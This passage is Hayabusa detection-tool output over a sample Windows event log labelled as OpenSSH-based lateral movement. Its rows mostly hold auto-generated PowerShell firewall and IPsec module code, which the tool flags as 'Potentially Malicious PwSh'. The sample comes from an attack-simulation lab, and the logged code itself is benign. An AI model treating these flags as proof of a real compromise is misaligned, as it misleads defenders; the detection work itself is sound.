'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 
10:19:37.925 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.926 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.927 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.927 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.928 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.928 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.928 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.929 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.930 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.930 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 
[Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] 
${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else 
{ $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] 
